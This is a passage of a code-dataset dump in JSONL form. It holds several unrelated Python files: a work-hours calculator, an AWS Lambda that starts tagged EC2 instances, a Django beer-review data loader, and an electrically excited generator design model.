types will be registered here\n\t\tself.type = input (\"What is the new type of animal?: \")\n\t\tlist_type[id] = self.type\n\t\telegido = lista[id]\n\t\telegido_t= list_type[id]\n\t\tprint (\"The new type is \" + elegido_t + \" for the animal \" + elegido)\nnew_animal = Animal()","sub_path":"ZooChapu.py","file_name":"ZooChapu.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"268909310","text":"import datetime\r\nimport math\r\nimport re # regex\r\nimport pyperclip\r\nfrom enum import Enum, unique\r\n\r\nimport timetracker as tt\r\n\r\n### Main Program ###\r\nnow = datetime.datetime.now()\r\n\r\n# %A dictates to use the actual day of the week (Sunday - Saturday)\r\nday = now.strftime(\"%A\").lower()\r\n\r\n# Time separated into Hour & Minutes\r\ncurrent_hour = now.hour\r\ncurrent_minute = now.minute\r\n\r\n\r\n# Will set this up to read from file or use dialog setup, later\r\n# That will help with using custom target_hours\r\nTARGET_HOURS_STANDARD = {\"monday\": 8, \"tuesday\": 16, \"wednesday\": 24,\r\n                         \"thursday\": 32, \"friday\": 40, \"saturday\": 48,\r\n                         \"sunday\": 56}\r\n\t\t\t\t\t\t \r\nTARGET_HOURS_MODIFIED = {\"monday\": 8, \"tuesday\": 8, \"wednesday\": 16,\r\n                         \"thursday\": 24, \"friday\": 32, \"saturday\": 48,\r\n                         \"sunday\": 56}\r\n\r\n# target_hours = TARGET_HOURS_STANDARD\r\ntarget_hours = TARGET_HOURS_STANDARD\r\n\r\n### INPUT ###\r\n# Whether or not you've taken your lunch. If you have, it's 0 (no time added to total) else 1\r\nlunch_taken = 0 #lunch_taken = ( 0 if ( input(\"Have you taken your lunch yet? (y/n)\\n\").lower() == 'y') else 1)\r\n\r\n\r\n### VARIABLE OVERRIDE ###\r\n#day = 'monday'\r\n### VARIABLE OVERRIDE ###\r\n\r\n\r\nhours_worked = tt.get_hours_worked_PS()\r\n\r\n# Time Remaining - Minutes & Seconds\r\ntime_remaining = target_hours[day] - hours_worked\r\n\r\n# Hours Remaining\r\nhours_remaining = int(time_remaining)\r\n\r\n# Minutes Remaining\r\nminutes_remaining = math.ceil( ( float(time_remaining % 1) * 60) )\r\n\r\n# Target time that the user should leave work for the day\r\ntarget_hour = (current_hour + hours_remaining) + lunch_taken\r\ntarget_minute = current_minute + minutes_remaining\r\n\r\ntarget_time = tt.to_time(target_hour, target_minute)\r\n\r\nprint(\"Time Worked:\", int(hours_worked//1), \"hours \", int( (hours_worked%1 * 60) ), \"minutes\\n\")\r\n\r\nprint(\"\\nLeave work by: \" + target_time + '\\n')\r\n\r\n# tt.create_leave_file(str(target_time))\r\n\r\ninput(\"Press ENTER to exit\")\r\n\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"512637352","text":"import os\nimport json\nimport boto3\n\n# AWS Region Name\nregion = os.getenv(\"AWS_REGION\") if os.getenv(\"AWS_REGION\") else \"us-east-1\"\n\n# AWS EC2 Resource Object\nec2 = boto3.resource(\"ec2\", region_name=region)\n\n# ==============================================================================\n# FUNCTION TO GET INSTANCES BY FILTER\n# ==============================================================================\n\ndef filter_instances():\n    # Filter to EC2 Instances\n    filters = [{\n        'Name': 'tag:env',\n        'Values': ['hom']\n    },\n    {\n        'Name': 'instance-state-name', \n        'Values': ['stopped']\n    }\n    ]\n    # Get all EC2 Instances by Filter\n    return ec2.instances.filter(Filters=filters) \n\n# 
==============================================================================\n# LAMBDA HANDLER FUNCTION\n# ==============================================================================\n \ndef lambda_handler(event, context):\n # Get Instances\n instances = filter_instances()\n\n # Get each instance ID of Instances\n RunningInstances = [instance.id for instance in instances]\n\n # Show Instances\n for index, value in enumerate(RunningInstances):\n print(f\"Instance {index} - {value}\")\n\n # Check Instances with tag \"env\" and value \"hom\"\n if len(RunningInstances) > 0:\n print(f\"Starting {len(RunningInstances)} instances\")\n shuttingDown = ec2.instances.filter(InstanceIds=RunningInstances).start()\n else:\n print(\"We don't have any instance in hom to start\")\n\n return {\n \"statusCode\": 200,\n \"body\": json.dumps(\"success\")\n }\n","sub_path":"code/start_instance_one.py","file_name":"start_instance_one.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"186000","text":"from time import timezone\n\nimport pandas as pd\nimport numpy as np\nimport decimal\n\nfrom django.http import HttpResponse\n\nfrom .models import *\n\ndef loadFile() :\n return pd.read_csv('reviews_pr.csv')\n\ndef saveBeerDB(beer) :\n Beer(\n name = beer['beer_name'],\n brewery = beer['brewery_name'],\n style = beer['beer_style'],\n abv = beer['beer_abv'],\n img = \"null\",\n score = beer['rating'],\n total_score=beer['rating'],\n reviewCnt = 1\n ).save()\n\ndef updateBeerDB(beer):\n data = Beer.objects.get(name=beer['beer_name'])\n score = decimal.Decimal(data.score * data.reviewCnt)\n data.reviewCnt = data.reviewCnt + 1\n score = (score + decimal.Decimal(beer['rating'])) / data.reviewCnt\n data.score = round(score, 1)\n total_score = decimal.Decimal(data.total_score)\n total_score = total_score + decimal.Decimal(beer['rating'])\n data.total_score = round(total_score,1)\n data.save()\n\ndef saveBreweryDB(beerData):\n if Brewery.objects.filter(name=beerData['beer_style']):\n return\n else:\n Brewery(\n name = beerData['beer_style']\n ).save()\n\n\ndef saveUserDB(beerData):\n if User.objects.filter(username=beerData['user']):\n return\n else:\n User(\n username=beerData['user'],\n password=123\n ).save()\n\ndef saveReviewDB(beerData):\n user = User.objects.get(username=beerData['user'])\n beer = Beer.objects.get(name=beerData['beer_name'])\n BeerReview(\n user=user,\n beer_pk = beer.pk,\n beer_name = beer.name,\n review = \"good\",\n score = decimal.Decimal(beerData['rating']),\n # published_date = timezone.now()\n ).save()\n\ndef uploadData() :\n reviewsData = loadFile()\n\n # upload database\n for i in reviewsData.index:\n beerData = reviewsData.loc[i]\n # beer\n if Beer.objects.filter(name=beerData['beer_name']):\n updateBeerDB(beerData)\n else:\n print(\"savebeer\")\n saveBeerDB(beerData)\n\n saveUserDB(beerData)\n saveBreweryDB(beerData)\n saveReviewDB(beerData)\n\ndef deleteData():\n queryset = Beer.objects.all()\n queryset.delete()\n qu = Brewery.objects.all()\n qu.delete()\n q = BeerReview.objects.all()\n q.delete()\n\n\n\ndef updateBeerScore(beer, oldScore, newScore):\n data = Beer.objects.get(name=beer.name)\n\n beer.total_score=beer.total_score-oldScore+newScore\n\n #print('data.score : ' + str(data.score))\n #print('data.reviewCnt : ' + str(data.reviewCnt))\n\n if oldScore==decimal.Decimal(0):#기존 리뷰 존재 X\n data.reviewCnt = data.reviewCnt + 1\n print('save success')\n else:#기존 리뷰 존재\n print('update 
success')\n\n    score = (beer.total_score) / data.reviewCnt\n    data.score = round(score, 1)\n    data.save()\n    #print('data.total_score : ' + str( beer.total_score))\n    #print('data.score : '+str(data.score))\n\ndef reviewUpdate(request):\n\n    if request.POST['score']=='0':\n        return HttpResponse(request)\n\n    oldScore=0\n    newScore=request.POST['score']\n    beer=Beer.objects.all()[int(request.POST['beer_pk'])-1]\n\n    #print('update')\n    if BeerReview.objects.filter(user=request.user,beer_pk=request.POST['beer_pk']): # 기존 리뷰 평점 업데이트\n        select=BeerReview.objects.get(user=request.user,beer_pk=request.POST['beer_pk'])\n        oldScore=select.score\n        select.score=decimal.Decimal(newScore)\n        select.published_date=timezone.now()\n        select.save()\n\n    else:# 새로운 리뷰 작성\n        BeerReview(\n            user=request.user,\n            beer_pk = request.POST['beer_pk'],\n            beer_name=beer.name,\n            review = \"Good\",\n            score = request.POST['score'],\n            published_date=timezone.now()\n        ).save()\n\n    updateBeerScore(beer,decimal.Decimal(oldScore),decimal.Decimal(newScore))\n\n    return HttpResponse(request)\n\n\ndef getReviews(request):\n\n    my_reviews=BeerReview.objects.filter(user=request.user).order_by('-published_date')\n\n    '''\n    정렬 우선순위\n    1. 자신의 리뷰\n    2. 최신 리뷰\n    '''\n\n    other_reviews=BeerReview.objects.exclude(user=request.user).order_by('-published_date')\n\n    return my_reviews|other_reviews","sub_path":"home/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"622724745","text":"\"\"\"eesgSE.py\nCreated by Latha Sethuraman, Katherine Dykes.\nCopyright (c) NREL. All rights reserved.\nElectromagnetic design based on conventional magnetic circuit laws\nStructural design based on McDonald's thesis \n\nThe pure-python part of an electrically excited generator module.\nThe OpenMDAO part is in eesgOM.py\n\"\"\"\n\nimport numpy as np\nfrom math import pi, cos, sqrt, radians, sin, exp, log10, log, tan, atan\nimport sys, os\n\nclass EESG(object):\n    \"\"\" Estimates overall mass dimensions and Efficiency of Electrically Excited Synchronous generator. 
\"\"\"\n \n def __init__(self):\n\n super(EESG, self).__init__()\n self.debug = False\n\n #------------------------\n \n def compute(self, rad_ag, len_s, h_s, tau_p, N_f, I_f, h_ys, h_yr, machine_rating, n_nom, Torque, \n b_st, d_s, t_ws, n_r, n_s, b_r, d_r, t_wr, R_o, rho_Fe, rho_Copper, rho_Fes, shaft_cm, shaft_length,\n debug=False):\n \n # Assign values to universal constants\n g1 = 9.81 # m / s^2 acceleration due to gravity\n E = 2e11 # N / m^2 young's modulus\n sigma = 48.373e3 # shear stress of steel in psi (~333 MPa)\n mu_0 = pi * 4e-7 # permeability of free space in m * kg / (s**2 * A**2)\n phi = radians(90)\n \n # Assign values to design constants\n h_w = 0.005\n b_so = 0.004 # Stator slot opening\n m = 3 # number of phases\n q1 = 2 # no of stator slots per pole per phase\n b_s_tau_s = 0.45 # ratio of slot width to slot pitch\n k_sfil = 0.65 # Slot fill factor (not used)\n P_Fe0h = 4 # specific hysteresis losses W / kg @ 1.5 T @50 Hz\n P_Fe0e = 1 # specific eddy losses W / kg @ 1.5 T @50 Hz\n rho_Cu = 1.8e-8 * 1.4 # resisitivity of copper # ohm-meter (Why the 1.4 factor?)\n k_fes = 0.9 # iron fill factor (not used)\n y_tau_p = 1 # coil span / pole pitch fullpitch\n k_fillr = 0.7 # rotor slot fill factor\n k_s = 0.2 # magnetic saturation factor for iron\n T = Torque\n cos_phi = 0.85 # power factor\n \n # back iron thickness for rotor and stator\n t_s = h_ys\n t = h_yr\n \n # Aspect ratio\n K_rad = len_s / (2 * rad_ag)\n \n ###################################################### Electromagnetic design#############################################\n \n alpha_p = pi / 2 * .7 # (not used)\n dia = 2 * rad_ag # air gap diameter\n \n # air gap length and minimum values\n g = 0.001 * dia \n if g < 0.005 :\n g = 0.005\n \n r_r = rad_ag - g # rotor radius\n d_se = dia + 2 * h_s + 2 * h_ys # stator outer diameter (not used)\n p = np.round(pi * dia / (2 * tau_p)) # number of pole pairs\n S = 2 * p * q1 * m # number of slots of stator phase winding\n N_conductors = S * 2\n N_s = N_conductors / 2 / m # Stator turns per phase\n alpha = 180 / S / p # electrical angle (not used)\n \n tau_s = pi * dia / S # slot pitch\n h_ps = 0.1 * tau_p # height of pole shoe\n b_pc = 0.4 * tau_p # width of pole core\n h_pc = 0.6 * tau_p # height of pole core\n h_p = 0.7 * tau_p # pole height\n b_p = h_p\n b_s = tau_s * b_s_tau_s # slot width\n Slot_aspect_ratio = h_s / b_s\n b_t = tau_s - b_s # tooth width\n \n # Calculating Carter factor and effective air gap\n g_a = g\n K_C1 = (tau_s + 10 * g_a) / (tau_s - b_s + 10 * g_a) # salient pole rotor\n g_1 = K_C1 * g\n \n # calculating angular frequency\n om_m = 2 * pi * n_nom / 60\n om_e = 60\n f = n_nom * p / 60\n \n # Slot fill factor according to air gap radius\n \n if 2 * rad_ag > 2:\n K_fills = 0.65\n else:\n K_fills = 0.4\n \n # Calculating Stator winding factor \n \n k_y1 = sin(y_tau_p * pi / 2) # chording factor\n k_q1 = sin(pi / 6) / q1 / sin(pi / 6 / q1) # winding zone factor\n k_wd = k_y1 * k_q1\n \n # Calculating stator winding conductor length, cross-section and resistance\n \n shortpitch = 0\n l_Cus = 2 * N_s * (2 * (tau_p - shortpitch / m / q1) + len_s) # length of winding\n A_s = b_s * (h_s - h_w)\n A_scalc = b_s * 1000 * (h_s - h_w) * 1000 # cross section in mm^2\n A_Cus = A_s * q1 * p * K_fills / N_s\n A_Cuscalc = A_scalc * q1 * p * K_fills / N_s\n R_s = l_Cus * rho_Cu / A_Cus\n \n # field winding design, conductor length, cross-section and resistance\n \n N_f = np.round(N_f) # rounding the field winding turns to the nearest integer\n I_srated = 
machine_rating / (sqrt(3) * 5000 * cos_phi)\n l_pole = len_s - 0.050 + 0.120 # 50mm smaller than stator and 120mm longer to accommodate end stack\n K_fe = 0.95 \n l_pfe = l_pole * K_fe\n l_Cur = 4 * p * N_f * (l_pfe + b_pc + pi / 4 * (pi * (r_r - h_pc - h_ps) / p - b_pc))\n A_Cur = k_fillr * h_pc * 0.5 / N_f * (pi * (r_r - h_pc - h_ps) / p - b_pc)\n A_Curcalc = k_fillr * h_pc * 1000 * 0.5 / N_f * (pi * (r_r - h_pc - h_ps) / p - b_pc) * 1000 \n Slot_Area = A_Cur * 2 * N_f / k_fillr # (not used)\n R_r = rho_Cu * l_Cur / A_Cur # ohms\n \n # field winding current density\n \n J_f = I_f / A_Curcalc\n \n # calculating air flux density\n \n B_gfm = mu_0 * N_f * I_f / (g_1 * (1 + k_s)) # No-load air gap flux density\n \n B_g = B_gfm * 4*sin(0.5 * b_p * pi / tau_p) / pi # fundamental component\n B_symax = tau_p * B_g / pi / h_ys # stator yoke flux density\n L_fg = 2 * mu_0 * p * len_s * 4 * N_f**2 * ((h_ps / (tau_p - b_p)) + (h_pc / (3 * pi * (r_r - h_pc - h_ps) / p - b_pc))) # (not used)\n \n # calculating no-load voltage and stator current\n \n E_s = 2 * N_s * len_s * rad_ag * k_wd * om_m * B_g / sqrt(2) # no-load voltage\n #I_s = (E_s - (E_s**2 - 4 * R_s * machine_rating / m)**0.5) / (2 * R_s)\n erm = E_s**2 - 4 * R_s * machine_rating / m\n if erm < 0:\n sys.stderr.write('eesgSE ERROR: erm {:.2f} < 0 E_s {:.2f} R_s {:.2f} MachRtd {:.0f} m {}\\n'.format(erm[0], E_s[0], R_s[0], machine_rating[0], m))\n I_s = (E_s - erm**0.5) / (2 * R_s)\n \n # Calculating stator winding current density and specific current loading\n \n A_1 = 6 * N_s * I_s / (pi * dia)\n J_s = I_s / A_Cuscalc\n \n # Calculating magnetic loading in other parts of the machine\n \n delta_m = 0 # Initialising load angle\n \n # peak flux density in pole core, rotor yoke and stator teeth\n \n B_pc = (1 / b_pc) * ((2 * tau_p / pi) * B_g * cos(delta_m) + (2 * mu_0 * I_f * N_f * ((2 * h_ps / (tau_p - b_p)) + (h_pc / (tau_p - b_pc)))))\n B_rymax = 0.5 * b_pc * B_pc / h_yr\n B_tmax = (B_gfm + B_g) * tau_s * 0.5 / b_t\n \n # Calculating leakage inductances in the stator\n \n L_ssigmas = 2 * mu_0 * len_s * N_s**2 / p / q1 * ((h_s - h_w) / (3 * b_s) + h_w / b_so) # slot leakage inductance\n L_ssigmaew = mu_0 * 1.2 * N_s**2 / p * 1.2 * (2 / 3 * tau_p + 0.01) # end winding leakage inductance\n L_ssigmag = 2 * mu_0 * len_s * N_s**2 / p / q1 * (5 * (g / b_so) / (5 + 4 * (g / b_so))) # tooth tip leakage inductance\n L_ssigma = (L_ssigmas + L_ssigmaew + L_ssigmag) # stator leakage inductance\n \n # Calculating effective air gap\n \n '''\n What is the source of this function that combines 1st and 13th powers? Very suspicious...\n Inputs appear to be in the range of 0.45 to 2.2, so outputs are 180 to 178000\n \n Equations given without reference in:\n H. Polinder, J. G. Slootweg . 
“Design optimization of a synchronous generator for a direct-drive wind turbine,” \n (paper presented at the European Wind Energy Conference, Copenhagen, Denmark, July2–6, 2001\n \n def airGapFn(B, fact):\n val = 400 * B + 7 * B**13\n ans = val * fact\n sys.stderr.write('aGF: B {} val {} ans {}\\n'.format(B, val, ans))\n return val\n \n At_t = h_s * airGapFn(B_tmax, h_s)\n At_sy = tau_p / 2 * airGapFn(B_symax, tau_p/2)\n At_pc = (h_pc + h_ps) * airGapFn(B_pc, h_pc + h_ps)\n At_ry = tau_p / 2 * airGapFn(B_rymax, tau_p/2)\n '''\n At_g = g_1 * B_gfm / mu_0\n At_t = h_s * (400 * B_tmax + 7 * B_tmax**13)\n At_sy = tau_p * 0.5 * (400 * B_symax + 7 * B_symax**13)\n At_pc = (h_pc + h_ps) * (400 * B_pc + 7 * B_pc**13)\n At_ry = tau_p * 0.5 * (400 * B_rymax + 7 * B_rymax**13)\n g_eff = (At_g + At_t + At_sy + At_pc + At_ry) * g_1 / At_g\n \n L_m = 6 * k_wd**2 * N_s**2 * mu_0 * rad_ag * len_s / pi / g_eff / p**2\n B_r1 = (mu_0 * I_f * N_f * 4 * sin(0.5 * (b_p / tau_p) * pi)) / g_eff / pi # (not used)\n \n # Calculating direct axis and quadrature axes inductances\n L_dm = (b_p / tau_p +(1 / pi) * sin(pi * b_p / tau_p)) * L_m\n L_qm = (b_p / tau_p -(1 / pi) * sin(pi * b_p / tau_p) + 2 / (3 * pi) * cos(b_p * pi / 2 * tau_p)) * L_m\n \n # Calculating actual load angle\n \n delta_m = atan(om_e * L_qm * I_s / E_s)\n L_d = L_dm + L_ssigma # (not used)\n L_q = L_qm + L_ssigma # (not used)\n I_sd = I_s * sin(delta_m)\n I_sq = I_s * cos(delta_m)\n \n # induced voltage\n \n E_p = om_e * L_dm * I_sd + sqrt(E_s**2 - (om_e * L_qm * I_sq)**2) # (not used)\n # M_sf = mu_0 * 8*rad_ag * len_s * k_wd * N_s * N_f * sin(0.5 * b_p / tau_p * pi) / (p * g_eff * pi)\n # I_f1 = sqrt(2) * (E_p) / (om_e * M_sf)\n # I_f2 = (E_p / E_s) * B_g * g_eff * pi / (4 * N_f * mu_0 * sin(pi * b_p / 2/tau_p))\n # phi_max_stator = k_wd * N_s * pi * rad_ag * len_s * 2*mu_0 * N_f * I_f * 4*sin(0.5 * b_p / tau_p / pi) / (p * pi * g_eff * pi)\n # M_sf = mu_0 * 8*rad_ag * len_s * k_wd * N_s * N_f * sin(0.5 * b_p / tau_p / pi) / (p * g_eff * pi)\n \n L_tot = len_s + 2 * tau_p\n \n # Excitation power\n V_fn = 500\n Power_excitation = V_fn * 2 * I_f # total rated power in excitation winding\n Power_ratio = Power_excitation * 100 / machine_rating\n \n # Calculating Electromagnetically Active mass\n L_tot = len_s + 2 * tau_p # (not used)\n V_Cuss = m * l_Cus * A_Cus # volume of copper in stator\n V_Cusr = l_Cur * A_Cur # volume of copper in rotor\n V_Fest = len_s * pi * ((rad_ag + h_s)**2 - rad_ag**2) \\\n - 2 * m * q1 * p * b_s * h_s * len_s # volume of iron in stator tooth\n V_Fesy = len_s * pi * ((rad_ag + h_s + h_ys)**2 - (rad_ag + h_s)**2) # volume of iron in stator yoke\n V_Fert = l_pfe * 2 * p * (h_pc * b_pc + b_p * h_ps) # volume of iron in rotor pole\n V_Fery = l_pfe * pi * ((r_r - h_ps - h_pc)**2 - (r_r - h_ps - h_pc - h_yr)**2) # volume of iron in rotor yoke\n \n Copper = (V_Cuss + V_Cusr) * rho_Copper\n M_Fest = V_Fest * rho_Fe\n M_Fesy = V_Fesy * rho_Fe\n M_Fert = V_Fert * rho_Fe\n M_Fery = V_Fery * rho_Fe\n Iron = M_Fest + M_Fesy + M_Fert + M_Fery\n \n I_snom = machine_rating / (3 * E_s * cos_phi)\n \n ## Optional## Calculating mmf ratio\n F_1no_load = 3 * 2**0.5 * N_s * k_wd * I_s / (pi * p) # (not used)\n Nf_If_no_load = N_f * I_f\n F_1_rated = (3 * 2**0.5 * N_s * k_wd * I_srated) / (pi * p)\n Nf_If_rated = 2 * Nf_If_no_load\n Load_mmf_ratio = Nf_If_rated / F_1_rated\n \n ## Calculating losses\n #1. 
Copper losses\n K_R = 1.2 # skin effect correction coefficient\n P_Cuss = m * I_snom**2 * R_s * K_R\n P_Cusr = I_f**2 * R_r \n P_Cusnom_total = P_Cuss + P_Cusr # Watts\n \n #2. Iron losses ( Hysteresis and Eddy currents)\n P_Hyys = M_Fesy * (B_symax / 1.5)**2 * (P_Fe0h * om_e / (2 * pi * 60)) # Hysteresis losses in stator yoke\n P_Ftys = M_Fesy * (B_symax / 1.5)**2 * (P_Fe0e * (om_e / (2 * pi * 60))**2) # Eddy losses in stator yoke\n P_Fesynom = P_Hyys + P_Ftys\n P_Hyd = M_Fest * (B_tmax / 1.5)**2 * (P_Fe0h * om_e / (2 * pi * 60)) # Hysteresis losses in stator teeth\n P_Ftd = M_Fest * (B_tmax / 1.5)**2 * (P_Fe0e * (om_e / (2 * pi * 60))**2) # Eddy losses in stator teeth\n P_Festnom = P_Hyd + P_Ftd\n \n # brushes\n delta_v = 1\n n_brushes = I_f * 2 / 120\n \n if n_brushes < 0.5:\n n_brushes = 1\n else:\n n_brushes = np.round(n_brushes)\n \n #3. brush losses\n \n p_b = 2 * delta_v * I_f\n Losses = P_Cusnom_total + P_Festnom + P_Fesynom + p_b\n gen_eff = machine_rating * 100 / (Losses + machine_rating)\n \n ################################################## Structural Design ########################################################\n \n ## Structural deflection calculations\n \n # rotor structure\n \n q3 = B_g**2 / 2/mu_0 # normal component of Maxwell's stress\n #l = l_s # l - stator core length - now using l_s everywhere\n l_b = 2 * tau_p # end winding length # (not used)\n l_e = len_s + 2 * 0.001 * rad_ag # equivalent core length # (not used)\n a_r = (b_r * d_r) - ((b_r - 2 * t_wr) * (d_r - 2 * t_wr)) # cross-sectional area of rotor armms\n A_r = len_s * t # cross-sectional area of rotor cylinder\n N_r = np.round(n_r)\n theta_r = pi / N_r # half angle between spokes\n I_r = len_s * t**3 / 12 # second moment of area of rotor cylinder\n I_arm_axi_r = ((b_r * d_r**3) - ((b_r - 2 * t_wr) * (d_r - 2 * t_wr)**3)) / 12 # second moment of area of rotor arm\n I_arm_tor_r = ((d_r * b_r**3) - ((d_r - 2 * t_wr) * (b_r - 2 * t_wr)**3)) / 12 # second moment of area of rotot arm w.r.t torsion\n R = r_r - h_ps - h_pc - 0.5 * h_yr\n R_1 = R - h_yr * 0.5 # inner radius of rotor cylinder\n k_1 = sqrt(I_r / A_r) # radius of gyration\n m1 = (k_1 / R)**2 \n c = R / 500 # (not used)\n \n u_all_r = R / 10000 # allowable radial deflection \n b_all_r = 2 * pi * R_o / N_r # allowable circumferential arm dimension \n \n # Calculating radial deflection of rotor structure according to Mc Donald's\n Numer = R**3 * ((0.25 * (sin(theta_r) - (theta_r * cos(theta_r))) / (sin(theta_r))**2) - (0.5 / sin(theta_r)) + (0.5 / theta_r))\n Pov = ((theta_r / (sin(theta_r))**2) + 1 / tan(theta_r)) * ((0.25 * R / A_r) + (0.25 * R**3 / I_r))\n Qov = R**3 / (2 * I_r * theta_r * (m1 + 1))\n Lov = (R_1 - R_o) / a_r\n Denom = I_r * (Pov - Qov + Lov) # radial deflection % rotor\n u_Ar = (q3 * R**2 / E / h_yr) * (1 + Numer / Denom)\n \n # Calculating axial deflection of rotor structure\n \n w_r = rho_Fes * g1 * sin(phi) * a_r * N_r\n mass_st_lam = rho_Fe * 2*pi * (R + 0.5 * h_yr) * len_s * h_yr # mass of rotor yoke steel\n W = g1 * sin(phi) * (mass_st_lam + (V_Cusr * rho_Copper) + M_Fert) / N_r # weight of rotor cylinder\n l_ir = R # length of rotor arm beam at which rotor cylinder acts\n l_iir = R_1\n \n y_Ar = (W * l_ir**3 / 12 / E / I_arm_axi_r) + (w_r * l_iir**4 / 24 / E / I_arm_axi_r) # axial deflection\n \n # Calculating torsional deflection of rotor structure\n \n z_all_r = radians(0.05 * R) # allowable torsional deflection\n z_A_r = (2 * pi * (R - 0.5 * h_yr) * len_s / N_r) * sigma * (l_ir - 0.5 * h_yr)**3 / (3 * E * I_arm_tor_r) # 
circumferential deflection\n \n # STATOR structure\n \n A_st = len_s * t_s\n a_s = (b_st * d_s) - ((b_st - 2 * t_ws) * (d_s - 2 * t_ws))\n N_st = np.round(n_s)\n theta_s = pi / N_st \n I_st = len_s * t_s**3 / 12\n I_arm_axi_s = ((b_st * d_s**3) - ((b_st - 2 * t_ws) * (d_s - 2 * t_ws)**3)) / 12 # second moment of area of stator arm\n I_arm_tor_s = ((d_s * b_st**3) - ((d_s - 2 * t_ws) * (b_st - 2 * t_ws)**3)) / 12 # second moment of area of rotot arm w.r.t torsion\n R_st = rad_ag + h_s + h_ys * 0.5\n R_1s = R_st - h_ys * 0.5\n k_2 = sqrt(I_st / A_st)\n m2 = (k_2 / R_st)**2\n \n # allowable deflections\n \n b_all_s = 2 * pi * R_o / N_st\n u_all_s = R_st / 10000\n y_all = 2 * len_s / 100 # allowable axial deflection\n z_all_s = radians(0.05 * R_st) # allowable torsional deflection\n \n # Calculating radial deflection according to McDonald's\n \n Numers = R_st**3 * ((0.25 * (sin(theta_s) - (theta_s * cos(theta_s))) / (sin(theta_s))**2) - (0.5 / sin(theta_s)) + (0.5 / theta_s))\n Povs = ((theta_s / (sin(theta_s))**2) + 1 / tan(theta_s)) * ((0.25 * R_st / A_st) + (0.25 * R_st**3 / I_st))\n Qovs = R_st**3 / (2 * I_st * theta_s * (m2 + 1))\n Lovs = (R_1s - R_o) * 0.5 / a_s\n Denoms = I_st * (Povs - Qovs + Lovs)\n R_out = R / 0.995 + h_s + h_ys\n u_As = (q3 * R_st**2 / E / t_s) * (1 + Numers / Denoms)\n \n # Calculating axial deflection according to McDonald\n \n l_is = R_st - R_o\n l_iis = l_is\n l_iiis = l_is # length of rotor arm beam at which self-weight acts\n mass_st_lam_s = M_Fest + pi * len_s * rho_Fe * ((R_st + 0.5 * h_ys)**2 - (R_st - 0.5 * h_ys)**2)\n W_is = g1 * sin(phi) * (rho_Fes * len_s * d_s**2 * 0.5) # weight of rotor cylinder \n W_iis = g1 * sin(phi) * (V_Cuss * rho_Copper + mass_st_lam_s) / 2/N_st\n w_s = rho_Fes * g1 * sin(phi) * a_s * N_st\n \n X_comp1 = W_is * l_is**3 / (12 * E * I_arm_axi_s)\n X_comp2 = W_iis * l_iis**4 / (24 * E * I_arm_axi_s)\n X_comp3 = w_s * l_iiis**4 / (24 * E * I_arm_axi_s)\n \n y_As = X_comp1 + X_comp2 + X_comp3 # axial deflection\n \n # Calculating torsional deflection\n \n z_A_s = 2 * pi * (R_st + 0.5 * t_s) * len_s / (2 * N_st) * sigma * (l_is + 0.5 * t_s)**3 / (3 * E * I_arm_tor_s)\n \n # tangential stress constraints\n \n TC1 = T / (2 * pi * sigma)\n TC2 = R**2 * len_s\n TC3 = R_st**2 * len_s\n \n # Calculating inactive mass and total mass\n \n mass_stru_steel = 2 * N_st * (R_1s - R_o) * a_s * rho_Fes\n Structural_mass = mass_stru_steel + (N_r * (R_1 - R_o) * a_r * rho_Fes)\n Mass = Copper + Iron + Structural_mass\n \n # Calculating mass moments of inertia and center of mass\n I = np.zeros(3)\n I[0] = 0.50 * Mass * R_out**2\n I[1] = 0.25 * Mass * R_out**2 + Mass * len_s**2 / 12\n I[2] = I[1]\n cm = np.zeros(3)\n cm[0] = shaft_cm[0] + shaft_length / 2. 
+ len_s / 2\n cm[1] = shaft_cm[1]\n cm[2] = shaft_cm[2]\n \n return B_symax, B_tmax, B_rymax, B_gfm, B_g, B_pc, N_s, b_s, b_t, A_Cuscalc, A_Curcalc, b_p, \\\n h_p, p, E_s, f, I_s, R_s, L_m, A_1, J_s, R_r, Losses, Load_mmf_ratio, Power_ratio, \\\n n_brushes, J_f, K_rad, gen_eff, S, Slot_aspect_ratio, Copper, Iron, u_Ar, y_Ar, \\\n z_A_r, u_As, y_As, z_A_s, u_all_r, u_all_s, y_all, z_all_s, z_all_r, b_all_s, b_all_r, TC1, \\\n TC2, TC3, R_out, Structural_mass, Mass, cm, I\n\n\n'''\n # Unpack outputs\n rad_ag = inputs['rad_ag']\n l_s = inputs['l_s']\n h_s = inputs['h_s']\n tau_p = inputs['tau_p']\n N_f = inputs['N_f']\n I_f = inputs['I_f']\n h_ys = inputs['h_ys']\n h_yr = inputs['h_yr']\n machine_rating = inputs['machine_rating']\n n_nom = inputs['n_nom']\n Torque = inputs['Torque']\n \n b_st = inputs['b_st']\n d_s = inputs['d_s']\n t_ws = inputs['t_ws']\n n_r = inputs['n_r']\n n_s = inputs['n_s']\n b_r = inputs['b_r']\n d_r = inputs['d_r']\n t_wr = inputs['t_wr']\n \n R_o = inputs['R_o']\n rho_Fe = inputs['rho_Fe']\n rho_Copper = inputs['rho_Copper']\n rho_Fes = inputs['rho_Fes']\n shaft_cm = inputs['shaft_cm']\n shaft_length = inputs['shaft_length']\n'''\n","sub_path":"wisdem/drivetrainse/eesgSE.py","file_name":"eesgSE.py","file_ext":"py","file_size_in_byte":22366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"212804304","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport argparse\nfrom evaluate import evaluate_beam_search,predict_beam_search\nimport logging\nimport numpy as np\n\nimport config\nimport utils\n\nimport torch\nimport torch.nn as nn\nfrom torch import cuda\n\nfrom beam_search import SequenceGenerator\nfrom pykp.dataloader import KeyphraseDataLoader\nfrom train import load_data_vocab, init_model, init_optimizer_criterion\nfrom utils import Progbar, plot_learning_curve_and_write_csv\nimport pykp.io\nimport pykp\nfrom pykp.io import KeyphraseDatasetTorchText, KeyphraseDataset\n\n__author__ = \"Malar Invention\"\n__email__ = \"malarkannan.invention@gmail.com\"\n\nlogger = logging.getLogger()\n\n\ndef 